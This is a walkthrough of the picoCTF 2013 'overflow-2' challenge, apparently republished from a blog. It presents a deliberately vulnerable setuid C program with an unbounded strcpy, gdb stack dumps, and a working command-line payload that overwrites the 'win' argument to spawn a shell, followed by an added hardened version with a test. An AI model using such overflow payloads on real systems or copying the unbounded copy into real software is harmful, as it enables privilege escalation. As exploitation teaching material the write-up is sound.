pico-ctf-2013 overflow-2
Source: Internet | Posted under: how to run a script on Linux | Editor: 程序博客网 | Time: 2024/05/21 05:24
Introductory stack overflow series, tutorial 2
overflow2.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "dump_stack.h"

void vuln(int win, char *str) {
    char buf[64];
    strcpy(buf, str);                       /* unbounded copy: the overflow */
    dump_stack((void **) buf, 23, (void **) &win);
    printf("win = %d\n", win);
    if (win == 1) {                         /* win is an argument, stored above buf at ebp+0x8 */
        execl("/bin/sh", "sh", NULL);
    } else {
        printf("Sorry, you lose.\n");
    }
    exit(0);
}

int main(int argc, char **argv) {
    if (argc != 2) {
        printf("Usage: stack_overwrite [str]\n");
        return 1;
    }
    uid_t euid = geteuid();
    setresuid(euid, euid, euid);
    vuln(0, argv[1]);
    return 0;
}
dump_stack: prints the current stack.
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : disabled
PIE       : disabled
RELRO     : Partial
As you can see, this program is quite fragile. All we need to do is overflow data so that win becomes 1.
Two methods:
Method one:
gdb --args ./overflow2 $(python -c "print 'A'*64+'B'*4")
Debug in gdb. Since the source contains an if, we step into vuln and find the assembly corresponding to that if, as follows:
0x8048666 <vuln+62>:    mov    DWORD PTR [esp],eax
0x8048669 <vuln+65>:    call   0x80483f0 <printf@plt>
0x804866e <vuln+70>:    mov    eax,DWORD PTR [ebp+0x8]
**0x8048671 <vuln+73>:    cmp    eax,0x1**
0x8048674 <vuln+76>:    jne    0x8048694 <vuln+108>
0x8048676 <vuln+78>:    mov    DWORD PTR [esp+0x8],0x0
So this time the value at address ebp+0x8 is compared with 1. As in the first post of this series, set a breakpoint at the cmp and examine the contents of the stack.
gdb-peda$ x/90x 0xffffce20
0xffffce20: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce28: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce30: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce38: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce40: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce48: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce50: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce58: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce60: 0x42 0x42 0x42 0x42 0x00 0xf1 0xea 0xf7
0xffffce68: 0x98 0xce 0xff 0xff 0x0b 0x87 0x04 0x08
0xffffce70: 0x00 0x00 0x00 0x00 0x65 0xd1 0xff 0xff
0xffffce78: 0xe8 0x03
Corresponding screenshot:
ebp+0x8 = 0xffffce70, and 0xffffce70 is 0x50 bytes above the char array (0xffffce70 - 0xffffce20). So we construct:
./overflow2 $(python -c "print 'A'*80+'\x01\x00\x00\x00'")
Result screenshot:
The approach is basically the same as in the earlier posts of this series.
Method two: the idea is to write an automated script that loops and checks whether the overflow succeeded. Implementing it is still a bit difficult; I'll write it later.
Note: because of operating-system differences, some addresses may be different; always use the addresses from your own machine. Related files: file address. Comments welcome!!!
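For comparison, here is a hardened form of vuln() as an added example (my own code, not part of the original writeup or the challenge). It keeps the program's logic but refuses any argument that would not fit in buf with its terminator, so the strcpy can no longer reach the saved frame pointer, the return address or the win argument 80 bytes above buf; the shell is only reported, not spawned, and the payload-building helper is a constructed test input.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64

/* Hardened replacement for vuln(): returns -1 if the input is rejected as too
 * long, otherwise the value of win after the copy (1 would mean "shell"). */
int vuln_fixed(int win, const char *str) {
    char buf[BUF_SIZE];
    /* memchr never scans past BUF_SIZE bytes; no terminator inside means the
     * string is at least BUF_SIZE long and strcpy would have spilled past buf. */
    const char *nul = memchr(str, '\0', BUF_SIZE);
    if (nul == NULL) {
        return -1;                      /* reject instead of overflowing */
    }
    memcpy(buf, str, (size_t)(nul - str) + 1);   /* bounded by the check above */
    return win;                         /* win arrives as 0 and stays 0 */
}

/* Constructed input mirroring the page's payload: 80 'A's followed by 0x01.
 * (The original's trailing "\x00\x00\x00" never reaches the program anyway,
 * because argv strings end at the first NUL.) Returns 1 if vuln_fixed
 * rejects it, 0 otherwise. */
int page_payload_rejected(void) {
    char payload[82];
    memset(payload, 'A', 80);
    payload[80] = 0x01;
    payload[81] = '\0';
    return vuln_fixed(0, payload) == -1;
}

int main(void) {
    printf("vuln_fixed(0, \"short\") -> %d\n", vuln_fixed(0, "short"));
    printf("page payload rejected   -> %d\n", page_payload_rejected());
    return 0;
}
```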